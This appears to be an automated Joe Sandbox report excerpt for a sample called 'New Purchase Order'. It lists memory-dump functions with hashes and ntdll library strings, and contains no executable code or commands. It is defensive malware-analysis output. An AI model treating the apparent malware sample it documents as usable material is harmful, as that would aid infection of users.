                          • Opcode Fuzzy Hash: cb7d3aa1ba30c97df3d4c209a354ae18547409fd688336eafbe11dae30627cbe
                          • Instruction Fuzzy Hash: FA90023120544842D14471584544A46501697D0305F95C011A0065698DD7258E55BB61
                          Function 01172AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 50ce4ceee16833a87fe1b9a2a1de036832dd620ffd169d6228a7fd62643a1d14
                          • Instruction ID: 9c9d68114ea3fd753965e87366b234b280b3b353ffd0050d7b41fa6f239ab606
                          • Opcode Fuzzy Hash: 50ce4ceee16833a87fe1b9a2a1de036832dd620ffd169d6228a7fd62643a1d14
                          • Instruction Fuzzy Hash: 6A9002A1201540924504B2588544B0A950697E0301B95C016E1055564CC62589519635
                          Function 01172AD0 Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 596d1799a031d23fa18233ce064a9d8eb4b19b6b775f6027f51c11a09fd16ec9
                          • Instruction ID: 1d38bf88e6b2c2828903d286edf1aab690428006e58e1e3494d89d8954cfa286
                          • Opcode Fuzzy Hash: 596d1799a031d23fa18233ce064a9d8eb4b19b6b775f6027f51c11a09fd16ec9
                          • Instruction Fuzzy Hash: 7C90043531140003010DF55C07445075047D7D53513D5C031F1017554CD731CD715731
                          Function 01172AF0 Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c0274ae146449580619dc563156836319e9e204af90646a481dfb58b934ec6b2
                          • Instruction ID: 69aefa57b322311b61a3ddb8986ccabda7c1cd228a581484a9324812dd17a021
                          • Opcode Fuzzy Hash: c0274ae146449580619dc563156836319e9e204af90646a481dfb58b934ec6b2
                          • Instruction Fuzzy Hash: E0900225221400020149B558074450B5446A7D63513D5C015F1417594CC72189655721
                          Function 01172D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 394fb2b6caacd44ca1609a89b8d9e3637e8f70f6bcd488c344fd25d490ea53c6
                          • Instruction ID: 50180f8f95c5c37cac25062479f5d798719ce10a531ba51f7d52da76f1fc0b05
                          • Opcode Fuzzy Hash: 394fb2b6caacd44ca1609a89b8d9e3637e8f70f6bcd488c344fd25d490ea53c6
                          • Instruction Fuzzy Hash: 0A90022921340002D1847158554860A500697D1302FD5D415A001655CCCA1589695721
                          Function 01172D00 Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ebadb31bda2498ca9871be0a9403d4a75cc7a48fbd520f7852181137b5d32804
                          • Instruction ID: 6265a2a6ede2e23e325f25ecc3fe480175bae8b8c41f08b18076674ee8b520a8
                          • Opcode Fuzzy Hash: ebadb31bda2498ca9871be0a9403d4a75cc7a48fbd520f7852181137b5d32804
                          • Instruction Fuzzy Hash: B190022120544442D10475585548A06500697D0305F95D011A1065599DC7358951A631
                          Function 01172D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5f8a1c6045f7d92ffc009a3228dbbbdad391719206809cade9f9a4677f3de5be
                          • Instruction ID: 8f8618a68a7141fe33616817f9e9fa1a0d4b614b6e7680fd225ae8491c91e46c
                          • Opcode Fuzzy Hash: 5f8a1c6045f7d92ffc009a3228dbbbdad391719206809cade9f9a4677f3de5be
                          • Instruction Fuzzy Hash: AD90022130140003D144715855586069006E7E1301F95D011E0415558CDA1589565722
                          Function 01172DB0 Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 86592c651a1e2da544de345bbd0c5900bdb886dc8f2d9590455e8134fd1ccdcd
                          • Instruction ID: 13141060951e198e1d6247683bb89aed91347827eb45abcd3477b865c47c0c0f
                          • Opcode Fuzzy Hash: 86592c651a1e2da544de345bbd0c5900bdb886dc8f2d9590455e8134fd1ccdcd
                          • Instruction Fuzzy Hash: 7E90023124140402D14571584544606500AA7D0341FD5C012A0425558EC7558B56AF61
                          Function 01172DD0 Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e06a66ac6d1376fa4d936cfa92bb3fe409eee3e30efd605c82f4adcd7605b934
                          • Instruction ID: 8abe14b3e1cad6d8252692d0dcf5341ba5d067a748952e743550ac9a3b9d9aee
                          • Opcode Fuzzy Hash: e06a66ac6d1376fa4d936cfa92bb3fe409eee3e30efd605c82f4adcd7605b934
                          • Instruction Fuzzy Hash: 89900221242441525549B15845445079007A7E03417D5C012A1415954CC6269956DB21
                          Function 01172C60 Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3b2556b2a91d3d62fe243fc727dc841b3239ef01996821837323389165c2827c
                          • Instruction ID: 5ddf14580fd84a640167f1dbe37278ab574c8863b600f7ab8d9023259d38dbb5
                          • Opcode Fuzzy Hash: 3b2556b2a91d3d62fe243fc727dc841b3239ef01996821837323389165c2827c
                          • Instruction Fuzzy Hash: 6F90023120140842D10471584544B46500697E0301F95C016A0125658DC715C9517A21
                          Function 01172CA0 Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 72dbd784387ffeaeb48b3156524ba5bbc7b35b2666c4c145c5fe7f2079eec89a
                          • Instruction ID: c8bcec817359b6293fa19f8caee4a2818f6c6a0599822bf05111acfa94933805
                          • Opcode Fuzzy Hash: 72dbd784387ffeaeb48b3156524ba5bbc7b35b2666c4c145c5fe7f2079eec89a
                          • Instruction Fuzzy Hash: B590023120140402D10475985548646500697E0301F95D011A5025559EC76589916631
                          Function 01172CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 93c96da69e0186f1ea515bdbea9e4cf97a13ca99ea91f47c8825725382190f27
                          • Instruction ID: 4217daac0cfec8ff09f1fea44b210bc8f3457da688db5618cf8f287ce071cc60
                          • Opcode Fuzzy Hash: 93c96da69e0186f1ea515bdbea9e4cf97a13ca99ea91f47c8825725382190f27
                          • Instruction Fuzzy Hash: 7F90022160540402D14471585558706501697D0301F95D011A0025558DC7598B556BA1
                          Function 01172CF0 Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e11ffaacb534f66e5283f4cfd80098cc7a57773db9f148e6317ab8f2c360acf3
                          • Instruction ID: 21b2f2e846da4d2881bdbc6afa6f16ee0f5f481e5166c64e29696ac4db31aeec
                          • Opcode Fuzzy Hash: e11ffaacb534f66e5283f4cfd80098cc7a57773db9f148e6317ab8f2c360acf3
                          • Instruction Fuzzy Hash: FD90043130140403D104715C574C7075007D7D0301FD5D411F043555CDD757CD517731
                          Function 01172F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 45fee63a76d4e5d5f9ff91ac9be2a864c453a38783482c04a334e4e5bac5d477
                          • Instruction ID: d1bcba5efe8dedd85418fc2c252c34d9c43152948ab9405c1c67ce1ac384cf5a
                          • Opcode Fuzzy Hash: 45fee63a76d4e5d5f9ff91ac9be2a864c453a38783482c04a334e4e5bac5d477
                          • Instruction Fuzzy Hash: BA90026134140442D10471584554B065006D7E1301F95C015E1065558DC719CD526626
                          Function 01172F60 Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f253134976d1e9b5dbc1b767932e2237879e1877f39032b21e3e9ce51c5efc1c
                          • Instruction ID: 1f2d1a752e60d1a246cd937b9415540f11d73481985b2eb12026d75e3bfe3da6
                          • Opcode Fuzzy Hash: f253134976d1e9b5dbc1b767932e2237879e1877f39032b21e3e9ce51c5efc1c
                          • Instruction Fuzzy Hash: D290026121140042D10871584544706504697E1301F95C012A2155558CC6298D615625
                          Function 01172F90 Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1729eb43222bb4982f875517c84db59a727b14a9906fd47c1f009e52e3eadda8
                          • Instruction ID: a40a3267b60b1a58ad63680cc1c30050efc29b1e34be1d3dbcc701faa65c1c38
                          • Opcode Fuzzy Hash: 1729eb43222bb4982f875517c84db59a727b14a9906fd47c1f009e52e3eadda8
                          • Instruction Fuzzy Hash: 0A90023120180402D1047158495470B500697D0302F95C011A1165559DC72589516A71
                          Function 01172FB0 Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cbfa8e448ed1351b5588617a7f96ac2f36f9ae90b5832906ad653436c653c607
                          • Instruction ID: 687eff24938e1562552ef81caaa8ed81ef6db6a4e727e1ff1d9b63c1e599b71f
                          • Opcode Fuzzy Hash: cbfa8e448ed1351b5588617a7f96ac2f36f9ae90b5832906ad653436c653c607
                          • Instruction Fuzzy Hash: 7D900221601400424144716889849069006BBE1311795C121A0999554DC65989655B65
                          Function 01172FA0 Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f95cb60e949fa73af385c7996ec2b05dc9cb58571834475459c0cedfa4d4ca01
                          • Instruction ID: 677abcc886e6b66b845b78521d9dc0326070a8f1d523c7d34a601d2c284def73
                          • Opcode Fuzzy Hash: f95cb60e949fa73af385c7996ec2b05dc9cb58571834475459c0cedfa4d4ca01
                          • Instruction Fuzzy Hash: D090023120180402D10471584948747500697D0302F95C011A5165559EC765C9916A31
                          Function 01172FE0 Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 37982a9fd20ae29cd365c4066e963cf51579f2cb06cbdf78972aedc18a408038
                          • Instruction ID: 4d46d3d6655e6e25e66a92dcae825606d9235dad7a5eec49e8ecf0bb3242ec6a
                          • Opcode Fuzzy Hash: 37982a9fd20ae29cd365c4066e963cf51579f2cb06cbdf78972aedc18a408038
                          • Instruction Fuzzy Hash: 6F900221211C0042D20475684D54B07500697D0303F95C115A0155558CCA1589615A21
                          Function 01172E30 Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 18d3a300ec10fedb894c76f062d08a5e396adb78fed7b38f574e6cea89edfc12
                          • Instruction ID: edf6e0503625be2ac2ca333b9eac8525edbb6112fa27c9398cae13d988505dbb
                          • Opcode Fuzzy Hash: 18d3a300ec10fedb894c76f062d08a5e396adb78fed7b38f574e6cea89edfc12
                          • Instruction Fuzzy Hash: 2990022130140402D10671584554606500AD7D1345FD5C012E1425559DC7258A53A632
                          Function 01172E80 Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cd01ef1a852e65641989298e640d81be187af9e57d08efd6a48d146e7f241465
                          • Instruction ID: e66f376f479d26c56706799206930658035a597e447506a938000973e9e3c4dd
                          • Opcode Fuzzy Hash: cd01ef1a852e65641989298e640d81be187af9e57d08efd6a48d146e7f241465
                          • Instruction Fuzzy Hash: DD90022160140502D10571584544616500B97D0341FD5C022A1025559ECB258A92A631
                          Function 01172EA0 Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c105367a5d3d70a0ef6eed86a78d820ca919336b55d3d9b7166564589a4027e3
                          • Instruction ID: b54223aa7a00700434adbf323c33a3d5e111c4c7ca126ebba89fd18e75632901
                          • Opcode Fuzzy Hash: c105367a5d3d70a0ef6eed86a78d820ca919336b55d3d9b7166564589a4027e3
                          • Instruction Fuzzy Hash: BD90027120140402D14471584544746500697D0301F95C011A5065558EC7598ED56B65
                          Function 01172EE0 Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 03a0ad87e115c9d5c07b61a8787b4e5ffa27a820d2f94d8692f3a58eab655451
                          • Instruction ID: 6498497c6a4c8a21a2afae743e7e90760ff4dea64297f1ba5d6aef359d516fe5
                          • Opcode Fuzzy Hash: 03a0ad87e115c9d5c07b61a8787b4e5ffa27a820d2f94d8692f3a58eab655451
                          • Instruction Fuzzy Hash: B390026120180403D14475584944607500697D0302F95C011A2065559ECB298D516635
                          Function 01173010 Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fbc5b04f28f445b461cc515d76b59959f53b86e29ec19ff30eb6f37930588090
                          • Instruction ID: 0689407838a3f23ee21435ee19086291a1d6223a13fad66d50cc1aaa7f9b109a
                          • Opcode Fuzzy Hash: fbc5b04f28f445b461cc515d76b59959f53b86e29ec19ff30eb6f37930588090
                          • Instruction Fuzzy Hash: FD90022120184442D14472584944B0F910697E1302FD5C019A4157558CCA1589555B21
                          Function 01173090 Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7d282e602517f907ef8781e669f7f191cbc66270f9df0317a5dd3279609f9981
                          • Instruction ID: a4ec7d274c2e79ecf7b6fcf2be3272270cd2a560ebdff97e9113258183e15ce0
                          • Opcode Fuzzy Hash: 7d282e602517f907ef8781e669f7f191cbc66270f9df0317a5dd3279609f9981
                          • Instruction Fuzzy Hash: D790022124140802D144715885547075007D7D0701F95C011A0025558DC7168A656BB1
                          Function 011739B0 Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 98a51c00efab5ab88b7132363e2957d8befe71c21d42d9003130d781c13ce3cb
                          • Instruction ID: b8ffa3d532551e614d63730f3b8c5212b59690305002760da328d95396cb7d5e
                          • Opcode Fuzzy Hash: 98a51c00efab5ab88b7132363e2957d8befe71c21d42d9003130d781c13ce3cb
                          • Instruction Fuzzy Hash: 6D90022124545102D154715C45446169006B7E0301F95C021A0815598DC65589556721
                          Function 01173D10 Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2e38780f3d6aa78e1eb5182de7d1699485b1bab0ae6377647658721f6055e3e6
                          • Instruction ID: 917fcb2337e9529016196da6cbfdae208dd6f1ce9b1334b717b275bac5989c2e
                          • Opcode Fuzzy Hash: 2e38780f3d6aa78e1eb5182de7d1699485b1bab0ae6377647658721f6055e3e6
                          • Instruction Fuzzy Hash: 2B90023120240142954472585944A4E910697E1302BD5D415A0016558CCA1489615721
                          Function 01173D70 Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d41b96f135b1ba1e0019fb020db0f02eb483502417d053f2729f2c8a638b9b57
                          • Instruction ID: 4bc5c9d2cef2c3f854d9affbae91a1e37418ba52bcb6d2cd08da0540b8d19216
                          • Opcode Fuzzy Hash: d41b96f135b1ba1e0019fb020db0f02eb483502417d053f2729f2c8a638b9b57
                          • Instruction Fuzzy Hash: 0390023520140402D51471585944646504797D0301F95D411A042555CDC75489A1A621
                          Function 01172C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                          • Instruction ID: c3d9ff23ec76b077a2f15cfd750199da3b790464156c98fe297fd4ebba1c44ad
                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                          • Instruction Fuzzy Hash:
                          Function 01172890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                          • API String ID: 48624451-2108815105
                          • Opcode ID: 5bf77aa728d805125bf72295290a6d5d5964dd888efb08a024fe8d8f8f8e8e3a
                          • Instruction ID: cc37e49180f413548ee81f9d5e13d1a5f5a4f55caecb2870c3d0f30ff956d979
                          • Opcode Fuzzy Hash: 5bf77aa728d805125bf72295290a6d5d5964dd888efb08a024fe8d8f8f8e8e3a
                          • Instruction Fuzzy Hash: 0651D6B5A00126AFDB19DB9C889097EFBF8BB08240B54C169F4A5D7741E374DE51CBA0
                          Function 011E2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                          • API String ID: 48624451-2108815105
                          • Opcode ID: 8abed2d6751c1c2d1b1c74bb3c18d22c69115dee17a9ea535dd265e65d293e12
                          • Instruction ID: da67e7f9783fb352ef700d6e1ad9e7e1e9c5977a3bb973aa6269a2d92fda421d
                          • Opcode Fuzzy Hash: 8abed2d6751c1c2d1b1c74bb3c18d22c69115dee17a9ea535dd265e65d293e12
                          • Instruction Fuzzy Hash: D751F771A00A45AECB38DF9CC9A497FB7FCEF48204B148459F596D7641D7B4EA408B60
                          Function 01167630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                          Download Yara Rule
                          Strings
                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 011A46FC
                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 011A4725
                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 011A4787
                          • Execute=1, xrefs: 011A4713
                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 011A4742
                          • ExecuteOptions, xrefs: 011A46A0
                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 011A4655
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                          • API String ID: 0-484625025
                          • Opcode ID: ebd5d986ed8c09039b44047c412c12ed907208090922cd07f57c543f58142f6c
                          • Instruction ID: d9a9773e691f950a2cd5d2d4dca1102d1e2316e7aa7f8d0bd30cc57e8b04e27c
                          • Opcode Fuzzy Hash: ebd5d986ed8c09039b44047c412c12ed907208090922cd07f57c543f58142f6c
                          • Instruction Fuzzy Hash: BF512B75A0021A7AEF2DABA8DC89FED7BBCAF14308F4400A9D605A71C0D7719E518F51
                          Function 01206940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                          • Instruction ID: f5f5ad136a2f0ed47713143a3873acceb3476d369e33c411d56e8672656871eb
                          • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                          • Instruction Fuzzy Hash: 30022571518342AFD306DF18C490E6BBBF5EFC8704F048A2DBA895B2A5DB31E945CB52
                          Function 0117B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID: __aulldvrm
                          • String ID: +$-$0$0
                          • API String ID: 1302938615-699404926
                          • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                          • Instruction ID: e87b829da64a4df289bf188e32e38dac7825346c8dcde481e7b527deefe42f67
                          • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                          • Instruction Fuzzy Hash: 3D81B170E492499EEF2D8E6CC8917FEBBB2AF45320F184219E961A73D1C7349940CB59
                          Function 011E20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                          Download Yara Rule
                          APIs
